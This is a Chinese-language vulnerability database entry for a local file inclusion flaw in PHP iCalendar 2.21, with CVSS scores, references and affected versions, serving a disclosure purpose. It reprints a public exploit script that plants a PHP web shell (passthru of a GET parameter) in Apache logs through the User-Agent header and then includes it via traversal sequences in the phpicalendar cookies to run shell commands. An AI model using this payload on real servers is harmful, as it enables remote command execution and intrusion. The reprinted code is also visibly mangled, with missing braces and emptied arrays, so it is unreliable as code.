发布时间 :2006-03-19 18:02:00
修订时间 :2011-03-07 21:32:43

[原文]Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.

[CNNVD]php iCalendar本地文件包含漏洞(CNNVD-200603-315)

        Jim Hu和Chad Little PHP iCalendar 2.21及其早期版本中存在目录遍历漏洞,远程攻击者可通过目录遍历序列和在phpicalendar[cookie_language]和phpicalendar[cookie_style] cookies中的一个"空"(%00)字符,包含和执行任意本地文件,如将PHP序列注入到Apache access_log文件中所显示的那样, 然后被.php包含。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  VUPEN  ADV-2006-1019
(UNKNOWN)  BID  17125

- 漏洞信息

php iCalendar本地文件包含漏洞
中危 路径遍历
2006-03-19 00:00:00 2006-03-20 00:00:00
        Jim Hu和Chad Little PHP iCalendar 2.21及其早期版本中存在目录遍历漏洞,远程攻击者可通过目录遍历序列和在phpicalendar[cookie_language]和phpicalendar[cookie_style] cookies中的一个"空"(%00)字符,包含和执行任意本地文件,如将PHP序列注入到Apache access_log文件中所显示的那样, 然后被.php包含。

- 公告与补丁


- 漏洞信息 (1585)

php iCalendar <= 2.21 (Cookie) Remote Code Execution Exploit (EDBID:1585)
php webapps
2006-03-15 Verified
0 rgod
N/A [点击下载]
#!/usr/bin/php -q -d short_open_tag=on
echo "php iCalendar <=2.21 \"cookie_language\"/\"cookie_style\" remote cmmnds xctn\r\n";
echo "-> arbitrary local inclusion through cookies\r\n";
echo "by rgod rgod<AT>autistici<DOT>org\r\n";
echo "site:\r\n\r\n";

# short explaination: phpICal stores language & template user preferences inside
# cookies. Theese values are used to include files, but there is no check for
# "../" chars... also you can break path trough a null char (%00) regardless of any
# magic_quotes_gpc settings, because they are serialized & we have a stripslashes
# on them. This code inject a shell in Apache log files, then tries to include
# it through phpicalendar[cookie_language] & phpicalendar[cookie_style] cookies

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to phpICal\r\n";
echo "cmd:       a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /phpical/ ls -la\r\n";


function quick_dump($string)
  for ($i=0; $i<=strlen($string)-1; $i++)
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 return $exa."\r\n".$result;
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    if (!$ock) {
      echo 'No response from proxy...';die;
  if ($proxy=='') {
    while (!feof($ock)) {
  else {
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  #echo "\r\n".$html;


for ($i=3; $i<=$argc-1; $i++){
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
if ($temp=="-P")
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "[1] Injecting some code in log files...\r\n";
$CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}';
$CODE.='passthru($_GET[cmd]);echo 666;die;?>';
$packet.="GET ".$path.$CODE." HTTP/1.1\r\n";
$packet.="User-Agent: ".$CODE."\r\n";
$packet.="Host: ".$serv."\r\n";
$packet.="Connection: close\r\n\r\n";
#echo quick_dump($packet);

# fill with possible locations
$paths= array (

for ($i=0; $i<=count($paths)-1; $i++)
  echo "[".$j."] Trying with ".$paths[$i]."%00\r\n";
  $packet ="GET ".$p."day.php?cmd=".$cmd." HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Cookie: phpicalendar=".$xpl."; PHPSESSID=;\r\n";
  $packet.="Connection: Close\r\n\r\n";
  #debug, shows packets in a nice format
  #echo quick_dump($packet);
  if (strstr($html,"666")){
    echo "Exploit succeeded...\r\n";
    echo $temp[1];
#if you are here...
echo "Exploit failed...";

# [2006-03-15]

- 漏洞信息

PHP iCalendar Cookie Values Traversal Local File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-03-15 Unknow
2006-03-15 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

php iCalendar Local File Include Vulnerability
Input Validation Error 17125
Yes No
2006-03-15 12:00:00 2009-02-09 05:58:00
rgod is credited with the discovery of this vulnerability.

- 受影响的程序版本

PHP iCalendar PHP iCalendar 2.2.1
PHP iCalendar PHP iCalendar 2.0.1
PHP iCalendar PHP iCalendar 2.0 c
PHP iCalendar PHP iCalendar 2.0 b
PHP iCalendar PHP iCalendar 2.0 a2
PHP iCalendar PHP iCalendar 2.24
PHP iCalendar PHP iCalendar 2.23 rc1
PHP iCalendar PHP iCalendar 2.22
PHP iCalendar PHP iCalendar 2.22
PHP iCalendar PHP iCalendar 2.1
PHP iCalendar PHP iCalendar 2.0

- 漏洞讨论

PHP iCalendar is prone to a local file-include vulnerability. This may facilitate the unauthorized viewing of files and unauthorized execution of local scripts.

PHP iCalendar 2.21 and prior versions are vulnerable; other versions may be affected as well.

- 漏洞利用

Example exploit code has been supplied:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at:

- 相关参考